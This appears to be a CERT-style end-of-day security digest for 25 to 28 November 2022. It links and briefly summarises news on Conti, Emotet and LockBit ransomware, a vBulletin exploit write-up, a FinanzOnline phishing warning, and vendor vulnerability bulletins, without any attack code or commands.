End-of-Day report
Timeframe: Freitag 25-11-2022 18:00 - Montag 28-11-2022 18:00
Handler: Michael Schlagenhaufer
Co-Handler: Thomas Pribitzer
News
Win32.Ransom.Conti / Crypto Logic Flaw
Conti ransomware FAILS to encrypt non PE files that have a ".exe" in the filename.
https://cxsecurity.com/issue/WLB-2022110044
Bring Your Own Key - A Placebo?
BYOK was envisioned to reduce the risk of using a cloud service provider processing sensitive data, yet there are several deficiencies.
https://www.darkreading.com/cloud/bring-your-own-key-a-placebo-
All You Need to Know About Emotet in 2022
For 6 months, the infamous Emotet botnet has shown almost no activity, and now its distributing malicious spam. Lets dive into details and discuss all you need to know about the notorious malware to combat it.
https://thehackernews.com/2022/11/all-you-need-to-know-about-emotet-in.html
Hacking Smartwatches for Spear Phishing
In this article we explain how to hack into a SmartWatch and show a custom text message.
https://cybervelia.com/?p=1380
Exploiting an N-day vBulletin PHP Object Injection Vulnerability
vBulletin is one of the most popular proprietary forum solutions over the Internet. It is used by some major websites, and according to the BuildWith website, vBulletin currently ranks at the second place on the Forum Software Usage Distribution in the Top 1 Million Sites, with over 2.000 websites using it among the -top 1 million-.
https://karmainsecurity.com/exploiting-an-nday-vbulletin-php-object-injection
Poking a mobile hotspot
Ive been playing with an Orbic Speed, a relatively outdated device that only speaks LTE Cat 4, but the towers I can see from here are, uh, not well provisioned so throughput really isnt a concern (and refurbs are $18, so). As usual Im pretty terrible at just buying devices and using them for their intended purpose, and in this case it has the irritating behaviour that if theres a power cut and the battery runs out it doesnt boot again when power returns, so heres what Ive learned so far.
https://mjg59.dreamwidth.org/61725.html
Vorsicht vor gefälschtem FinanzOnline-E-Mail
-Sie erhalten einen Betrag- lautet der Betreff eines betrügerischen E-Mail, das angeblich von FinanzOnline kommt. Sie werden informiert, dass Sie eine Rückerstattung von 578,99 Euro erhalten. Um das Geld zu bekommen, müssen Sie auf den Link im E-Mail klicken. Vorsicht: Dieser führt auf eine gefälschte FinanzOnline-Seite. Kriminelle stehlen Ihre Daten.
https://www.watchlist-internet.at/news/vorsicht-vor-gefaelschtem-finanzonline-e-mail/
Emotet Strikes Again - LNK File Leads to Domain Wide Ransomware
The intrusion began when a user double clicked a LNK file, which then executed encoded Powershell commands to download an Emotet DLL onto the computer. Once executed, Emotet setup a Registry Run Key to maintain persistence on the beachhead host.
https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
LockBit Ransomware Being Mass-distributed With Similar Filenames
The ASEC analysis team had written about LockBit ransomware being distributed through emails over three blog posts. Through consistent monitoring, we hereby let you know that LockBit 2.0 and LockBit 3.0 are being distributed again with only a change to their filenames.
https://asec.ahnlab.com/en/42890/
Vulnerabilities
Security updates for Monday
Security updates have been issued by Debian (chromium, commons-configuration2, graphicsmagick, heimdal, inetutils, ini4j, jackson-databind, and varnish), Fedora (drupal7-i18n, grub2, kubernetes, and python-slixmpp), Mageia (botan, golang, kernel, kernel-linus, radare2/rizin, and xterm), Red Hat (krb5, varnish, and varnish:6), SUSE (busybox, chromium, erlang, exiv2, firefox, freerdp, ganglia-web, java-1_8_0-openj9, nodejs12, nodejs14, opera, pixman, python3, sudo, tiff, and xen), [...]
https://lwn.net/Articles/916135/
Cisco ISE Vulnerabilities Can Be Chained in One-Click Exploit
Multiple vulnerabilities in Cisco Identity Services Engine (ISE) could allow remote attackers to inject arbitrary commands, bypass existing security protections, or perform cross-site scripting (XSS) attacks.
https://www.securityweek.com/cisco-ise-vulnerabilities-can-be-chained-one-click-exploit
Google Projekt Zero legt Schwachstelle in Mali GPU offen, Millionen Android-Geräte betroffen
Google Sicherheitsforscher haben im Project Zero eine Schwachstelle (CVE-2022-33917) im Kerneltreiber der in vielen Android-Geräten mit ARM CPU verwendeten Mali GPU offen gelegt.
https://www.borncity.com/blog/2022/11/27/google-projekt-zero-legt-schwachstelle-in-mali-gpu-offen-millionen-android-gerte-betroffen/
Security Bulletin: IBM Maximo Mobile is vulnerable to Information Disclosure (CVE-2022-41732)
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-mobile-is-vulnerable-to-information-disclosure-cve-2022-41732/
Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect App Connect Professional.
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-ibm-java-sdk-affect-app-connect-professional-3/
Security Bulletin: IBM App Connect Enterprise Certified Container operands may be vulnerable to arbitrary code execution due to X-Force 237819
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-app-connect-enterprise-certified-container-operands-may-be-vulnerable-to-arbitrary-code-execution-due-to-x-force-237819/
MISP v2.4.166
https://github.com/MISP/MISP/releases/tag/v2.4.166